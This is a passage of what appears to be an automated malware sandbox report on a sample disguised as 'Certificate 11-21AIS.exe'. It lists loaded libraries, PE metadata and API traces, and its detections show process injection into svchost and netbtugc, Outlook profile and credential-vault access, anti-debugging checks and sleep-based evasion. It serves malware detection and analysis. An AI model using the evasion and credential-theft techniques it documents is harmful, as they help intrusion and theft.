            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Certificate 11-21AIS.exeStatic file information: File size 1189888 > 1048576
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Certificate 11-21AIS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144260794.000000000098E000.00000002.00000001.01000000.00000004.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000000.1892574732.000000000098E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-21AIS.exe, 00000000.00000003.1686506113.0000000003850000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-21AIS.exe, 00000000.00000003.1687615785.0000000003700000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1823927375.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823927375.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1734120490.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1735560481.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1823543961.0000000003223000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4145384785.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1826364865.00000000033D2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4145972280.0000000003BAC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000343C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2118473608.000000002492C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.1790454232.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1823610810.0000000003000000.00000004.00000020.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000003.1760491789.000000000080C000.00000004.00000001.00020000.00000000.sdmp
            Source: Certificate 11-21AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Certificate 11-21AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Certificate 11-21AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Certificate 11-21AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Certificate 11-21AIS.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DE01E LoadLibraryA,GetProcAddress,0_2_008DE01E
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008EC09E push esi; ret 0_2_008EC0A0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008EC187 push edi; ret 0_2_008EC189
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0092C8BC push esi; ret 0_2_0092C8BE
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E6B05 push ecx; ret 0_2_008E6B18
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090B2B1 push FFFFFF8Bh; iretd 0_2_0090B2B3
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008EBDAA push edi; ret 0_2_008EBDAC
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008EBEC3 push esi; ret 0_2_008EBEC5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004048A9 push esp; ret 1_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E2BA push 00000038h; iretd 1_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A436 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418C92 pushad ; retf 1_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A5D9 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004017E5 push ebp; retf 003Fh1_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403780 push eax; ret 1_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147A2 push es; iretd 1_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370225F pushad ; ret 1_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037027FA pushad ; ret 1_2_037027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037309AD push ecx; mov dword ptr [esp], ecx1_2_037309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0370283D push eax; iretd 1_2_03702858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0358225F pushad ; ret 3_2_035827F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035827FA pushad ; ret 3_2_035827F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035B09AD push ecx; mov dword ptr [esp], ecx3_2_035B09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0358283D push eax; iretd 3_2_03582858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0358135E push eax; iretd 3_2_03581369
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC0CE1 pushfd ; retf 3_2_02BC0D0B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BB2238 pushad ; iretd 3_2_02BB2239
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BBAB37 push 00000038h; iretd 3_2_02BBAB3B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BB6E56 push ebx; iretd 3_2_02BB6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BB6CB3 push ebx; iretd 3_2_02BB6E7D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BBD1B0 push es; ret 3_2_02BBD1D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BA1126 push esp; ret 3_2_02BA1127
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00928111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00928111
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008DEB42
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E123A
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeAPI/Special instruction interceptor: Address: 11B5E74
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 2618Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 7353Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeEvaded block: after key decisiongraph_0-93450
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeAPI coverage: 4.5 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444Thread sleep count: 2618 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444Thread sleep time: -5236000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444Thread sleep count: 7353 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6444Thread sleep time: -14706000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe TID: 3336Thread sleep time: -36000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00906CA9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009060DD
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009063F9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0090EB60
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0090F5FA
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090F56F FindFirstFileW,FindClose,0_2_0090F56F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00911B2F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00911C8A
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00911F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BBBAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_02BBBAB0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008DDDC0
            Source: netbtugc.exe, 00000003.00000002.4143985977.000000000307E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: firefox.exe, 00000008.00000002.2120116426.0000027A6484B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144253147.00000000013C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E rdtsc 1_2_0377096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417823 LdrLoadDll,1_2_00417823
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00916AAF BlockInput,0_2_00916AAF
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C3D19
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_008F3920
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DE01E LoadLibraryA,GetProcAddress,0_2_008DE01E
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B6140 mov eax, dword ptr fs:[00000030h]0_2_011B6140
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B60E0 mov eax, dword ptr fs:[00000030h]0_2_011B60E0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B4AF0 mov eax, dword ptr fs:[00000030h]0_2_011B4AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D437C mov eax, dword ptr fs:[00000030h]1_2_037D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov ecx, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B035C mov eax, dword ptr fs:[00000030h]1_2_037B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA352 mov eax, dword ptr fs:[00000030h]1_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8350 mov ecx, dword ptr fs:[00000030h]1_2_037D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B2349 mov eax, dword ptr fs:[00000030h]1_2_037B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C310 mov ecx, dword ptr fs:[00000030h]1_2_0372C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750310 mov ecx, dword ptr fs:[00000030h]1_2_03750310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A30B mov eax, dword ptr fs:[00000030h]1_2_0376A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F0 mov eax, dword ptr fs:[00000030h]1_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037663FF mov eax, dword ptr fs:[00000030h]1_2_037663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037403E9 mov eax, dword ptr fs:[00000030h]1_2_037403E9
